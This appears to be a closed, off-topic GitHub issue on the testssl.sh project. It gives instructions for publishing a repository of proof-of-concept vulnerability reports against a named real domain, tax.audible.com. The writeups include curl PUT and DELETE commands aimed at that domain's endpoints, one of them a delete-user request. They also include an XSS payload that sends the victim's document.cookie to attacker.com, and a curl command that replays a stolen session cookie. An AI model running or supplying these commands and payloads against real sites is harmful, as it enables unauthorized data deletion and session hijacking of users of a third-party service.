testssl/testssl.sh

[BUG / possible BUG]

Closed this issue · 1 comments

rollno01-dot commented

Create a Repository:

Log in to your GitHub account.

Create a new repository (you can name it something like "Vulnerability-PoCs" or related to the domain you're testing).

    Go to your GitHub homepage and click the "New" button under your repositories.

    Name the repository and provide a description. Make it public or private based on your preference.

    Initialize the repository with a README file (optional).

Structure the Repository:

README.md: Provide an overview of your repository, explain what the repository contains (PoCs), and mention the potential security risks.

PoC Folder: Create folders to organize the PoCs based on vulnerabilities or domain.
Example:

Vulnerability-PoCs/
├── README.md
├── PUT-DELETE-PATCH-Vulnerability/
│ └── poc-put-delete-patch.md
├── Session-Cookie-Vulnerability/
│ └── poc-session-cookie.md
└── report.txt
Write PoC Documentation:
For each vulnerability, create a markdown file with the following structure:

Example for PoC on PUT/DELETE/PATCH Methods:

File Path: Vulnerability-PoCs/PUT-DELETE-PATCH-Vulnerability/poc-put-delete-patch.md

PoC for PUT, DELETE, PATCH Methods

Vulnerability

The server exposes potentially risky HTTP methods (PUT, PATCH, DELETE) that can allow unauthorized users to modify or delete resources.

Steps to Reproduce

  1. Identify vulnerable endpoints:

    • Use Nmap or Burp Suite to scan for methods allowed on the server.
    • Example Nmap output shows PUT, PATCH, and DELETE allowed: 
      | http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE

  2. Use curl to test vulnerable methods:

    • Example of testing the PUT method: 
      curl -X PUT https://tax.audible.com/some-endpoint -d "data=test"

  3. Exploit the vulnerability:

    • Test with DELETE or PATCH to modify or delete server data.
    • Example DELETE command: 
      curl -X DELETE https://tax.audible.com/api/delete-user?id=12345

Expected Impact

Unauthorized modification or deletion of server resources.

Example for PoC on Missing HttpOnly Flag:

File Path: Vulnerability-PoCs/Session-Cookie-Vulnerability/poc-session-cookie.md

PoC for Missing HttpOnly Flag on Session Cookie

Vulnerability

The session cookie does not have the HttpOnly flag set, making it vulnerable to theft via JavaScript-based attacks (XSS).

Steps to Reproduce

  1. Inspect cookies:

    • Open browser's Developer Tools and check cookies under the Application tab.
    • Look for the session-id cookie and verify that the HttpOnly flag is not set.

  2. Test XSS:

    • Use an XSS payload to steal the session ID.
    • Example payload: 
      <script>document.location='http://attacker.com/steal-cookie?cookie=' + document.cookie;</script>

  3. Session Hijacking:

    • After stealing the cookie, use it to hijack the session: 
      curl -X GET https://tax.audible.com/ -H "Cookie: session-id=abcd1234"

Expected Impact

Session hijacking, unauthorized access to user data.

git add .
git commit -m "Added PoCs for risky HTTP methods and session cookie vulnerability"
git push origin main
Repository Name: Vulnerability-PoCs

Vulnerability PoCs

This repository contains proof of concept (PoC) submissions for security vulnerabilities found on the tax.audible.com domain.

PoCs